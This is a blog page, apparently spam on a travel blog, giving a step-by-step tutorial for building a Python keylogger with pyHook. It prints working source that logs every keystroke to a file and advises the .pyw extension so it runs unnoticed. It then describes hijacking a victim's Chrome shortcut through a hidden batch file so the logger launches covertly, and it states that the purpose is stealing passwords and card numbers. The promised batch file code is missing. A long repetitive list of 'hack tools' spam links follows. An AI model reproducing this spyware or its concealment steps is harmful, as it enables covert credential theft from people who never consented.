Our Interactive Travel Map and Blog

South America

South America
Choices, choices, choices

Tuesday 23 January 2024

How To Make A Simple And Powerful Keylogger Using Python

A keylogger is a computer program which can be written using any computer programming language such as c++ when you install it on a Victim system it can keep the records of every keystroke in a text file. Keylogger is mainly used to steal confidential data such as passwords, credit card numbers etc.

How to make a python keylogger?

A keylogger can be programmed using any programming language such as c++, java, c# e.tc. For this tutorial, I will use python to make a keylogger, because python is flexible, powerful and simple to understand even a non-programmer can use python to make a keylogger.
Requirements to create a python keylogger
  • Computer With Operating system: Windows, Mac os or Linux
  • Python must be installed on the system
  • Pip (Python index package ) you will need this to install python software packages.
  • Pypiwin32 and PyHook packages
  • Basic understanding of computers
You will learn to install these things one by one. If you have already installed and configured the python development kit feel free to skip Part 1.
Part 1: Downloading Python and pip, setting up the environment to create the keylogger.Step 1:
Download python development kit by clicking here.
Choose python 2.7 because I am using this version. It is ok if you have a different version of python this method will work on every version of python.
Step 2:
Installation of python is pretty simple.Open the python setup file, Mark the checkboxes Very important else you have to set the python path manually, and click on Install Now.
Step 3:
You need Pypiwin32 and PyHook python packages to create python keylogger. To install these packages you need pip, you can install Pypiwin32 and PyHook without using pip which is not recommended.
To download pip go to https://pip.pypa.io/en/stable/installing/ and Save link as by right clicking on get-pip.py. when the download is done, just run the get-pip.py file.
Now you need to set the Variable path for pip to do this right click on the computer icon and choose properties.
Now click on the Advanced system settings
Choose Environment Variables.
Choose New, Set the Variable name: PATH and Variable value as C:\Python27\Scripts
Click on ok.
Part 2: Installing Pypiwin32 and PyHook python Packages using pip:
Open Command Prompt(CMD) and type: pip installs Pypiwin32 press the Enter Key, wait for the installation to complete. After the Pypiwin32 package installation type: pip install PyHook press the Enter Key and wait for the installation to complete.When done close the Command Prompt.
Part 3: Creating and testing the python keylogger:
Now you have configured your environment and installed all the necessary packages, let's start creating the keylogger. Click on the start menu and scroll down until you find Python 2.7, run python IDLE(GUI) by clicking on it.
Go to the File, from the drop-down menu choose New file.

Python Keylogger source code:

Copy these lines of code and paste into the new file. Modify the directory in the second line of code to your own location e.g 'C:\test\log.txt' this will create a folder named test in C save the log.txt file there when the Keylogger start.
import pyHook, pythoncom, sys, logging
file_log='F:\\test\\log.txt'
def onKeyboardEvent(event):
logging.basicConfig(filename=file_log,level=logging.DEBUG,format='%(message)s')
chr(event.Ascii)
logging.log(10,chr(event.Ascii))
return True
hooks_manager=pyHook.HookManager()
hooks_manager.KeyDown=onKeyboardEvent
hooks_manager.HookKeyboard()
pythoncom.PumpMessages()
Save your file as a test.pyw at any location you want, the .pyw extension is very important because of it the python keylogger will run in the background without notifying the user.
The Python Keylogger is now completed you can test it out by opening it and typing some text in your browser, go to the log.txt file which is in the F:\test\log.txt on my PC. You will find your log.txt file in C:\test\log.txt.But what if you want to test it on someone else computer? you want to run it without the user knowing that it has been launched, this can be done by attaching it to the program that the victim always uses such as Google Chrome.
Let's make the python keylogger auto-launchable by attaching it the Google Chrome.
Copy the following code and paste into notepad. Save it by giving .bat extension e.g launch.bat in a hidden location, e.g c:\test\launch.bat
Now right click on the google chrome desktop shortcut icon and click on properties. You will see a field called Target. Change the target field to the batch file launch.bat directory that you created. let's say you have saved your launch.bat file in a test folder in C, Then change the target field with "C:\test\launch.bat". Now, whenever the user opens chrome the keylogger will run automatically.
Read more
  1. Hacker Tools Free Download
  2. Pentest Tools For Android
  3. New Hack Tools
  4. Hack Tools For Ubuntu
  5. Hackers Toolbox
  6. Pentest Tools For Ubuntu
  7. Hacking Tools Mac
  8. New Hack Tools
  9. Hack Tool Apk
  10. Pentest Tools Android
  11. Tools 4 Hack
  12. Bluetooth Hacking Tools Kali
  13. Hacking Tools Windows
  14. Pentest Tools List
  15. Hacker Search Tools
  16. Hack Tools For Games
  17. Hacker Security Tools
  18. Hack Tool Apk No Root
  19. Hacking Tools Usb
  20. Pentest Tools Github
  21. Hacker Tools Hardware
  22. Hacker Tools Github
  23. Hacking Tools Online
  24. Pentest Tools Tcp Port Scanner
  25. Pentest Recon Tools
  26. Easy Hack Tools
  27. Hack Tool Apk
  28. Tools For Hacker
  29. Hack App
  30. Android Hack Tools Github
  31. Best Pentesting Tools 2018
  32. Hacking Tools Mac
  33. Pentest Tools Subdomain
  34. Pentest Tools Kali Linux
  35. How To Make Hacking Tools
  36. Hack Tool Apk No Root
  37. Hacking Tools Pc
  38. Hacking Tools For Kali Linux
  39. Pentest Tools Apk
  40. Hacker Techniques Tools And Incident Handling
  41. Hacking Tools Name
  42. Black Hat Hacker Tools
  43. Pentest Tools
  44. Hacking Tools For Mac
  45. Hacker Tools List
  46. Nsa Hack Tools Download
  47. Pentest Tools Github
  48. Hacker Search Tools
  49. Hack Tools For Games
  50. Hacking Tools For Mac
  51. Easy Hack Tools
  52. Hack Tools 2019
  53. Hacking Tools Hardware
  54. Pentest Tools
  55. Usb Pentest Tools
  56. Hacker Tools Linux
  57. Hacking Tools Free Download
  58. Hack Tools Pc
  59. Hack Rom Tools
  60. Pentest Tools Free
  61. Pentest Tools Kali Linux
  62. Best Pentesting Tools 2018
  63. Hacker Tools Online
  64. Hacker Hardware Tools
  65. Hack Tools Pc
  66. Hacking Tools 2020
  67. Hacker Tools Software
  68. New Hack Tools
  69. Hacker Tools Apk
  70. Hacker Tools Windows
  71. Pentest Tools Open Source
  72. Computer Hacker
  73. Pentest Tools List
  74. How To Install Pentest Tools In Ubuntu
  75. What Are Hacking Tools
  76. Hacking Tools And Software
  77. Pentest Tools Android
  78. Pentest Automation Tools
  79. Hacking Tools For Windows 7
  80. Pentest Tools Github
  81. Hacking Tools For Mac
  82. Hacker Tools Online
  83. Hacking Tools For Windows Free Download
  84. What Are Hacking Tools
  85. Hacking Tools Github
  86. Hacker Tools For Mac
  87. Hacker Techniques Tools And Incident Handling
  88. Hacking Tools Usb
  89. Hacker Tools Free Download
  90. Top Pentest Tools
  91. How To Install Pentest Tools In Ubuntu
  92. Hack Rom Tools
  93. Hacker Tools 2020
  94. Android Hack Tools Github
  95. Pentest Tools Alternative
  96. Hacking Tools 2020
  97. Growth Hacker Tools
  98. Hacker Tools List
  99. Hack Apps
  100. Nsa Hacker Tools
  101. Pentest Tools Url Fuzzer
  102. Hacking Tools Windows 10
  103. Pentest Tools Nmap
  104. Hacking Tools Mac
  105. Bluetooth Hacking Tools Kali
  106. Hack App
  107. Pentest Tools Find Subdomains
  108. Pentest Tools For Mac
  109. Bluetooth Hacking Tools Kali
  110. Hack Tools Download
  111. Hacking App
  112. Hacker Tools Mac
  113. Tools Used For Hacking
  114. Hacking Tools Online
  115. Hacking Tools Free Download
  116. Hacker Tools Github
  117. Hack Tools Mac
  118. Hacker Tools For Ios
  119. Hacker Tools Apk Download
  120. Hack Tools
  121. Hacker Tools Windows
  122. Pentest Tools Kali Linux
  123. Pentest Tools Kali Linux
  124. Hacking Tools Windows 10
  125. Hacker Tools 2020
  126. Hackrf Tools
  127. Hack Tools For Windows
  128. Hacker Tools Github
  129. Black Hat Hacker Tools
  130. Hacking Tools 2019
  131. Hacker Tools Online
  132. Hacking Tools Name
  133. Pentest Tools
  134. New Hack Tools
  135. Hacking Tools For Mac
  136. Pentest Tools Subdomain
  137. Hack Website Online Tool
  138. Hack Website Online Tool
  139. Hacking Tools Online
  140. Pentest Tools Open Source
  141. Hacker Tools 2020
  142. Hack Website Online Tool
  143. Blackhat Hacker Tools
  144. Pentest Tools Port Scanner
  145. Hacking Tools For Windows Free Download
  146. Pentest Tools Linux
  147. Hack Tools
  148. Hack Tools For Mac
  149. Hack Tools For Windows
  150. Hacking Tools Name
  151. Hacker Tool Kit
  152. Hack Tools For Windows
  153. Hacker Hardware Tools
  154. Hak5 Tools
  155. What Is Hacking Tools
  156. Nsa Hacker Tools
  157. Hacker Security Tools

No comments: